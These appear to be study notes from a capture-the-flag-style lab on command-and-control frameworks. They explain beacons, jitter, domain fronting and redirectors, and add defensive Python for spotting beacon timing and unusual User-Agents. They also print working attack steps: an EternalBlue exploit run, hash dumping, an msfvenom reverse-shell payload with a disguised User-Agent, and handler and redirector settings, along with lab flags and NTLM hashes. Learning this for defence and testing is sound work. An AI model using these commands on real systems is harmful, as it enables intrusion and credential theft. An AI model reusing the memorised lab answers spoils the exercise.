Command and Control (C2) -manages compromised devices during an engagement and often aids lateral movement
Command and Control Framework -almost all C2 frameworks require a special payload generator -e.g. Metasploit → MSFVenom (payload generator)
C2 Server -serves as a hub for agents to call back to -agents will periodically reach out to C2 servers and wait for the operator’s commands
Agents / Payloads -Agent: program generated by the C2 framework that calls back to a listener on a C2 server -configurable, e.g. adjusting how often the agent beacons out to a listener on the C2 server, and more
Listeners -application running on C2 server that waits for a callback
Beacons -the process of a C2 agent calling back to the listener running on a C2 server
Obfuscating Agent Callbacks -Sleep Timers: the fixed interval between beacons; a constant beaconing rate forms a recognisable pattern in C2 traffic -Jitter: adds random variation to the sleep timer so the traffic looks more like normal activity
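To make the sleep-timer/jitter point concrete from the defender's side, here is an added example (my own, not part of these notes or of any framework): it models an agent that sleeps a fixed time with a configurable jitter, then scores a sequence of callback timestamps by how regular the gaps are. A coefficient of variation near 0 is the metronome pattern a plain sleep timer produces; jitter raises it but, for typical jitter percentages, still leaves it far below what interactive browsing shows. The sleep value, jitter percentage, threshold and the "browsing" gap list are constructed assumptions, not values from the notes.

```python
import random
import statistics
from typing import List

def beacon_schedule(sleep: float, jitter: float, count: int, seed: int = 1) -> List[float]:
    """Return `count` callback timestamps (seconds from start) for an agent that
    sleeps `sleep` seconds between beacons and randomises each sleep by +/-`jitter`
    (0.0 = no jitter, 0.2 = +/-20%). Assumed model; real agents differ in detail."""
    rng = random.Random(seed)  # seeded so the schedule is reproducible
    t = 0.0
    times = []
    for _ in range(count):
        t += sleep * (1 + rng.uniform(-jitter, jitter))
        times.append(t)
    return times

def gaps(timestamps: List[float]) -> List[float]:
    """Inter-arrival gaps between consecutive callbacks."""
    return [b - a for a, b in zip(timestamps, timestamps[1:])]

def beacon_score(timestamps: List[float]) -> float:
    """Coefficient of variation (stdev / mean) of the gaps.
    0.0 means perfectly periodic; large values mean irregular, human-like timing."""
    g = gaps(timestamps)
    if len(g) < 2:
        return float("inf")
    mean = statistics.fmean(g)
    if mean == 0:
        return float("inf")
    return statistics.pstdev(g) / mean

def looks_like_beacon(timestamps: List[float], max_cv: float = 0.3, min_events: int = 10) -> bool:
    """Flag a host->destination series as beacon-like when there are enough events
    and the gap regularity is below the (assumed) threshold."""
    return len(timestamps) >= min_events and beacon_score(timestamps) <= max_cv

# Constructed "human browsing" gaps (seconds) for comparison, not captured data.
BROWSING_GAPS = [1, 300, 5, 1200, 2, 60, 900, 3, 45, 400]
BROWSING_TIMES = [0.0]
for gap in BROWSING_GAPS:
    BROWSING_TIMES.append(BROWSING_TIMES[-1] + gap)

if __name__ == "__main__":
    for label, series in [
        ("sleep 60s, no jitter", beacon_schedule(60, 0.0, 50)),
        ("sleep 60s, 20% jitter", beacon_schedule(60, 0.2, 50)),
        ("constructed browsing", BROWSING_TIMES),
    ]:
        print(f"{label:24s} cv={beacon_score(series):.3f} beacon={looks_like_beacon(series)}")
```

Regularity scoring like this is one input to a beacon hunt, not a verdict on its own: legitimate update checks and monitoring agents are also periodic, so the score is usually combined with destination rarity, byte-size consistency and the User-Agent checks discussed further down.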
Payload Types -Staged and Stageless payloads -Stageless Payloads: A. Victim workstation downloads and executes the Dropper B. The beaconing to the C2 Server begins
-Staged: requires additional files from the C2 Server A. Victim workstation downloads and executes the Dropper B. Dropper calls back to the C2 Server for Stage 2 C. C2 Server receives the message and sends Stage 2 to the victim workstation D. Stage 2 is loaded into memory on the victim workstation E. The beaconing to the C2 Server begins
Payload Formats:
- PowerShell Scripts
- HTA Files
- JS files
- Visual Basic Apps/Scripts
- MS Office Docs
Modules -written in multiple languages, giving more flexibility -Post-Exploitation Modules: modules used after the initial compromise, e.g. finding paths for lateral movement, parsing credentials, etc. -Pivoting Modules: e.g. an SMB pivot to communicate with a restricted network segment from a computer you have admin access to
Domain Fronting -utilises a good (trusted) host -makes it appear that a workstation is communicating with a known, trusted IP address -the victim only communicates with the trusted site -commands are proxied through the trusted site to the victim workstations
C2 Profiles -the server looks at the User-Agent to determine whether the HTTP request came from a beacon or another device -if from a compromised device, it returns a C2 command -if from a non-compromised device, it returns a normal webpage https://blog.zsec.uk/cobalt-strike-profiles/ - C2 Profiles
Common C2 Frameworks -free frameworks are well understood, and signatures for them can be easily developed.
Free C2 Frameworks
- Metasploit - developed by Rapid7 - most popular exploit and post-exploitation framework
- Armitage - extension of metasploit - adds a GUI - written in Java - fast and easy
- PowerShell Empire/Starkiller - developed by the Veris Group - updated by the BC Security team - versatile (THM ROOM)
- Covenant - developed by Ryan Cobb - written in C# - used in Post-exploit and lateral movement w/ HTTP, HTTPS, SMB
- Sliver - developed by Bishop Fox - written in Go - various protocols for communication - masks and encrypts communication
Paid C2 Frameworks
- Cobalt Strike - developed by Raphael Mudge (HelpSystems) - written in Java - flexible
- Brute Ratel - developed by Chetan Nayak - customizable command and control center
Other C2 Frameworks
- C2 Matrix - developed by Jorge Orchilles and Bryson Bort
Setting up Armitage
- git clone https://gitlab.com/kalilinux/packages/armitage.git
- cd armitage
- bash package.sh
Teamserver - takes IP address and shared password as arguments; Armitage - enter host, port, username, password
preparing the environment: systemctl start postgresql && systemctl status postgresql; msfdb --use-defaults delete; msfdb --use-defaults init
connecting to Armitage:
cd /armitage/release/unix && ./teamserver
Accessing and managing your C2 infrastructure -SSH port-forwarding
Standard: TCP or UDP; HTTP/HTTPS: for networks with a firewall doing protocol inspection, combined with domain fronting or malleable C2 profiles; DNS: for devices that cannot easily access the internet - https://2017.zeronights.org/wp-content/uploads/materials/ZN17_SintsovAndreyanov_MeterpreterReverseDNS.pdf; SMB: flexible pivoting, accessing restricted network segments
AttackBox
- Setup: systemctl start postgresql && systemctl status postgresql; su ubuntu; msfdb --use-defaults delete; msfdb --use-defaults init; cd /opt/armitage/release/unix; ./teamserver [yourAttackBoxIP] [password] - (returns connection info); ./armitage (enter the info returned above)
- Scan Hosts > Nmap Scan > Quick Scan > [IP Ted-PC/32]
- Exploit: exploit > windows > smb > ms17_010_eternalblue
- Post Exploit: post > multi > manage > shell_to_meterpreter
Meterpreter shell - right click > Meterpreter 2 > Interact > Meterpreter Shell; cd /users/; cd Administrator/Desktop; cat root.txt > flag#1 THM{bd6ea6c871dced619876321081132744}
cd /users/Ted/Desktop cat user.txt > flag#3 THM{217fa45e35f8353ffd04cfc0be28e760}
Dump Hashes > right click > Meterpreter 2 > Access > Dump Hashes > Registry method; Administrator NTLM Hash flag#2: c1565d108721c5626a6a054d6e0943c; Ted NTLM Hash flag#4: 2e2618f266da8867e5664425c1309a5c
Advanced C2 Setups
Redirector -redirects HTTP/HTTPS requests based on information within the HTTP request (headers or body) -runs Apache 2 or NGINX -setting up a firewall to only allow communication to and from the redirectors mitigates potential risks
Setup Apache 2 -module: "mod_rewrite" -allows forming rules that forward requests to internal or external hosts based on specific HTTP headers or content -modules needed: rewrite, proxy, proxy_http and headers
apt install apache2 a2enmod rewrite && a2enmod proxy && a2enmod proxy_http && a2enmod headers && systemctl start apache2 && systemctl status apache2
-with Meterpreter, the threat actor makes a slight adjustment to the User-Agent in C2 HTTP/HTTPS payloads -the HTTP request might get overlooked if the User-Agents look similar to normal traffic
root@kali$ msfvenom -p windows/meterpreter/reverse_http LHOST=tun0 LPORT=80 HttpUserAgent=NotMeterpreter -f exe -o shell.exe
Modifying the Apache config file -location on Debian-based systems: cat /etc/apache2/sites-available/000-default.conf | grep -v '#'
mod_rewrite documentation: https://httpd.apache.org/docs/2.4/mod/mod_rewrite.html add: RewriteEngine On add: RewriteCond %{HTTP_USER_AGENT} "^NotMeterpreter$"
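The C2 profile section and the redirector section both turn on the same fact: the User-Agent is the field that separates beacon traffic from ordinary browsing, on the C2 side by exact match. The same field is therefore a cheap place for a defender to look. Below is an added example (my own, not code from these notes, Metasploit or Apache) that parses constructed web-proxy log lines and reports User-Agent strings that are seen from only one client yet repeat, which is how a custom value like the "NotMeterpreter" string above would stand out in a fleet whose browsers share a handful of agents. The log format, hostnames, IPs and thresholds are all constructed assumptions.

```python
import re
from collections import Counter, defaultdict
from typing import Dict, Iterable, List

# Constructed proxy log (not real traffic). Fields: time, client, method, URL, status, "User-Agent".
SAMPLE_LOG = """\
2024-05-01T09:00:01Z 10.0.0.11 GET https://intranet.example/home 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/125.0"
2024-05-01T09:00:04Z 10.0.0.12 GET https://intranet.example/home 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/125.0"
2024-05-01T09:00:05Z 10.0.0.13 GET https://news.example/ 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0"
2024-05-01T09:01:00Z 10.0.0.12 GET http://cdn.example/aFbcZ 200 "NotMeterpreter"
2024-05-01T09:02:00Z 10.0.0.12 GET http://cdn.example/aFbcZ 200 "NotMeterpreter"
2024-05-01T09:03:00Z 10.0.0.12 GET http://cdn.example/aFbcZ 200 "NotMeterpreter"
2024-05-01T09:03:30Z 10.0.0.14 GET https://updates.example/check 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0"
2024-05-01T09:04:00Z 10.0.0.15 GET https://news.example/ 200 "curl/8.5.0"
"""

# Assumed log layout; adapt the pattern to the proxy actually in use.
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')

def parse(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Turn raw log lines into dicts; malformed lines are skipped rather than crashing the hunt."""
    records = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, client, method, url, status, ua = m.groups()
        records.append({"ts": ts, "client": client, "method": method,
                        "url": url, "status": status, "ua": ua})
    return records

def rare_user_agents(records: List[Dict[str, str]], max_hosts: int = 1, min_hits: int = 3) -> Dict[str, Dict]:
    """Return User-Agents used by at most `max_hosts` distinct clients but seen at least
    `min_hits` times. One client repeating an agent nobody else uses is the shape a
    custom beacon User-Agent takes; a one-off tool run (few hits) is not reported."""
    hosts = defaultdict(set)
    hits = Counter()
    urls = defaultdict(set)
    for r in records:
        hosts[r["ua"]].add(r["client"])
        hits[r["ua"]] += 1
        urls[r["ua"]].add(r["url"])
    return {
        ua: {"hosts": sorted(hosts[ua]), "hits": hits[ua], "urls": sorted(urls[ua])}
        for ua in sorted(hosts)
        if len(hosts[ua]) <= max_hosts and hits[ua] >= min_hits
    }

if __name__ == "__main__":
    for ua, info in rare_user_agents(parse(SAMPLE_LOG.splitlines())).items():
        print(f"{ua!r}: {info['hits']} hits from {info['hosts']} to {info['urls']}")
```

Thresholds are deliberately conservative: a User-Agent seen from one host three times is worth a look, not an alert on its own, and the `urls` field helps the analyst see whether the single client kept hitting one odd path. Pair this with the gap-regularity score from the jitter example to rank the hits.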
Setting up exploit/multi/handler -LHOST: public IP -LPORT: chosen port -ReverseListenerBindAddress: IP -ReverseListenerBindPort: port -OverrideLHOST: redirector's IP -OverrideLPORT: redirector's port -HttpUserAgent: NotMeterpreter -OverrideRequestHost: true -run
Which setting name allows you to modify the User-Agent field in a Meterpreter payload? HTTPUSERAGENT
Which setting name allows you to modify the Host header in a Meterpreter payload? HttpHostHeader